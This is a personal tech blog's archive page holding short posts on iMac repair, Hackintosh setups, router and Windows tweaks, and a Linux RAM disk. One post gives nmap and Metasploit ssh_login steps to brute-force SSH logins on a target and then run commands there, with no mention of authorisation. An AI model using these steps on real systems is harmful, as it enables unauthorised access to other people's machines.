Saturday, December 14, 2019

2011 Apple 27 iMac bad/dead video card fix - Baking fun

I got a free iMac 27 computer that had the dreaded black screen and reboot, the one I got looks like someone had a go on it and had no idea how to take it apart, causing damage to connectors. First thing I did was to fix those so I could see what the real issues are.

With the connectors fixed it's time to see if it will boot, I use a Kali USB thumb drive to do this, if I can get into the OS then I can do some further diagnostic analysis but not here, I got the GRUB boot loader but when the desktop tries to load... reboot...  this points to a bad video card and it's well documented that is a very common issues with these.

This picture shows the symptom, black screen and reboot..

Lets fix it

Take the display off, if you don't know how, check out YouTube, lots of video's on how to do this but if this is out of your comfort zone, best not to attempt it.

Mainboard removed and heat sync for the CPU and Video card removed, both will get new thermal past. the old past was dried out and probably not helping much

Clean off all the old thermal past and prepare the video card for baking, I set the oven for 390f and baked the card for 9 minutes.

Reassemble everything back and make sure you plugged everything back in, I take pictures of all the connection before disassembly to have a record of what was connected and where. good thing is that you really can't mess this up as each connection is unique for each end point. 

TOP TIP: Before starting the boot up process, reset the NVRAM, Command + Option + P + R, wait for the boot chime and hold them down until you hear the second boot chime. let it boot.

I had a new install of High Sierra from a working Mac, so this install started out fresh. everything seem to work and I was able to get to the desktop.

Post OS boot I had some fans running full up and high temps, a couple of issues, one was the HDD fan was full speed due to the SSD. iMac's from this area had the HDD temp sensor built in and when changed from the Apple HDD the loss of that sensor makes the fan spin a full speed creating noise and disrupting the intel air flow. I found a free program called SSD Fan Control that lets you override the fan and set it down to 1100 RPM, that solved that problem but I still had over heating issues. The glass cover was destroyed, I used some painters tape to seal the edges, I think this helped with the internal air flow and the temps are stable and fan noise is very low.

I let the system run overnight and it's still alive. This was a fun repair of an older iMac that can still be used for some tasks. 

Friday, November 29, 2019

Catalina OS

These are my notes on Catalina OS on my main machine

Less is more

It's about the EFI/CLOVER folder




USBMap.kext <- I created this using the guide

config.plist <- this is the most important but the most misunderstood

ACPI section
These options are important but if you don't know what options to use, it may not be helping.

Boot Section
same as above

Boot Graphics
leave it alone, blank

no settings needed

Nothing to see here

Disable Drivers

Nothing here will fix anything once in the OS

You may or may not need something here..

Kernal and Kext Patches
Play with these but if you are getting into the OS without settings leave it alone

Rt Variables 
Leave it alone

This is important, choose wisely

System Parameters
Inject Kexts = Yes
Inject System ID = checked

Wednesday, October 2, 2019

New OS X Mojave on HP 800 G1

10.14.6 10/02/2019 using Intel onboard iGPU

BIOS (I am using v02.77 04/17/2019, but it should work with lower versions)
1. use bios defaults
2. Storage = SATA Emulation >AHCI
1. Install Sierra from a real MAC to the hard drive going into the HP EliteDesk 800 G1
2. Install Clover v5058 from real MAC to hard disk with the below options checked
   * Clover for UEFI booting only
   * Install Clover in the ESP
   * Themes
   * drivers/UEFI
   * Install RC scripts on target volume
   * Optional RC Scripts - All
   * Install Clover Preference Pane
Use Clover Configurator to Edit config.plist but see below for the code or just use mine and rename to config.plist 
4 Added the following Kext's to \EFI\CLOVER\kexts\Other
   *** Versions are important, use these or higher ***
   FakeSMC_ACPISensors.kext version 6.25-333-g05e0f4be.1759
   FakeSMC_CPUSensors.kext version 6.25-333-g05e0f4be.1759
   FakeSMC_GPUSensors.kext version 6.25-333-g05e0f4be.1759
   FakeSMC_LPCSensors.kext version 6.25-333-g05e0f4be.1759
   FakeSMC.kext 6.26-357-gceb835ea.1800
   IntelMausiEthernet.kext 2.5.0d0
   USBInjectAll.kext 0.6.7
   VoodooHDA.kext 2.9.2
   Lulu.kext 1.3.8
   WhateverGreen.kext 1.32
5 Reboot and setup
6 Sleep working, wake up using keyboard  -- open terminal and type sudo pmset -a standby 0   to resolve issues with waking up
NOTE: in my clover I am using USBMap.kext that I created, I recommenced that you remove this and use USBinjectAll.kext and create your own.

NOTE" VGA will not work, you will need to use the display port for your monitor, if you have a video card installed, check to make sure its compatible with OS X, top tip: install first without a video card, if all good, then install it.

Wednesday, September 11, 2019

Python base64 encode and decode

Mac OS X and Linux

import base64


Base64.encodestring('Text to encode')

Windows 10 Python 3.7

import base64


base64.b64encode(b'Text to encode')

I prefere Mac OS X or Linux but it does work in Windows 10

Sunday, September 8, 2019

Free HEVC H.265 for Windows 10

Thanks to Barnacules Nerdgasm for posting this. Save a 1$ and get the codec free from Microsoft 

Link to download FREE HEVC H265 video codec from Microsoft Store 👇 - Free Codec from Device Manufacturers ^- Don't buy the codec "Movies & TV" redirects you to, it's not necessary!

If Microsoft wants you to log in with your account or you don't have on, just click the X and it will install.

Wednesday, August 28, 2019

If you want Dark mode, well you know...


Find and go to the HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Themes > Personalize

For me Personalize folder is missing, if same in your case then Create new Key, Right click on Theme > New > Key (Give name Personalize)

Next Right click on Personalize folder and New > DWORD (32-bit) (Give name AppsUseLightTheme) and Set value to 0 (Right click on file > Modify)

Now perform the same steps 3 in this location: HKEY_CURRENT_USER > SOFTWARE > Microsoft > Windows > CurrentVersion > Themes > Personalize

if exists, modify and set value to 0

Restart your Lap

Saturday, June 22, 2019

How To Set Up A Repeater Bridge On Your DD-WRT Router

To begin, make sure that the main router has a 192.168.1.X subnet and leases a DHCP address in the same pool. The secondary router must be running DD-WRT.
To ensure an easy set up, always click Save and not Apply between steps.
  1. Reset to Factory Defaults on the secondary DD-WRT router. Perform a hard reset if needed.
  2. Hook up the secondary router with an Ethernet cord or just as a wireless client.
  3. Open the address in your browser to access the DD-WRT GUI.
  4. Open the Wireless tab and then the Basic Settings tab
    1. Physical Interface 
      1. Wireless Mode: Repeater Bridge
      2. Wireless Network Mode: Same as main router
      3. Wireless Network Name(SSID): Same as main router, including case
      4. Wireless Channel: Auto
      5. Sensitivity Range (ACK Timing): 0
      6. Click Save
    2. Virtual Interfaces: Click Add
      1. Wireless Network Name(SSID): Different SSID than Primary SSID
      2. Click Save
  5. Open the Wireless tab and then the Wireless Security tab
    1. Physical Interface (WPA2-AES is recommended)
      1. Security Mode, WPA Algorithms, Shared Key: Same as main router
    2. Virtual Interfaces
      1. Security Mode, WPA Algorithms, Shared Key: Same as main router
      2. Click Save
  6. Open the Security tab and then the Firewall tab
    1. Uncheck all boxes except Filter Multicast
    2. Disable SPI Firewall
    3. Click Save
  7. Open the Services tab and then Services tab
    1. Disable DNSMasq
    2. Click Save
  8. Open the Setup tab then the Basic Setup tab
    1. WAN Connection Type: Disabled
    2. IP Address:
    3. Mask:
    4. Gateway: (Same as main router)
    5. DHCP Server: Disable
    6. Local DNS: (Same as main router)
    7. Assign WAN Port to Switch: Use WAN port as another LAN port (Optional)
    8. Click Save
  9. Open the Setup tab and then Advanced Routing tab
    1. Change Mode to Router
    2. Click Save and then APPLY
    3. Wait 30 seconds and then power off the router and power it back on.
      1. Allow router to fully boot up.
  10. Open the address to access the router GUI at its new IP address
  11. Check internet connectivity, if it does not work then reboot the router

Wednesday, April 24, 2019

Create a RAM disk in Linux for fast file processes or forensics

I use this from time to time to do analysis on files for forensics reasons and I need some speed using the tools. A RAM disk can speed things up a lot but remember it will be gone the next time you restart.

mkdir -p /mnt/ram
mount -t tmpfs tmpfs /mnt/ram -o size=8192M

typical speed on a SSD would about about 190MB/s for file reads and writes 

using a RAM disk you can see up to 3.2 GB/s read and writes

good way to put things that need higher access, if you want to recreate at boot up you could create a shell script that would create the RAM disk and copy a file(s) to it.

Friday, March 29, 2019

Using Metasploit to exploit SSH on target system

looking for open SSH on target system
-nmap -A -Pn

found 22/tcp open ssh

- msfconsole
- search ssh_login
- use auxiliary/scanner/ssh/ssh_login
- set RHOSTS
- set USER_FILE /root/Desktop/user.txt <- make sure you have one
- set PASS_FILE /root/Desktop/user.txt <- make sure you have one
- set STOP ON SUCCESS true
- set VERBOSE true
- exploit

- sessions

start issuing commands and see what you got

- ls
- whoami
- uname -a


Sunday, January 27, 2019

Hackintosh Mojave with NVMe SSD

Installed Mojave on a Samsung NVMe SSD 512GB, nice speed bump.

I bought a NVMe to USB 3.0 adapter, installed OS X on to it from a real Mac using the adapter, added clover and my kexts, and installed into the computer.

I didn't see any speed improvement in booting but the OS is very snappy and fast.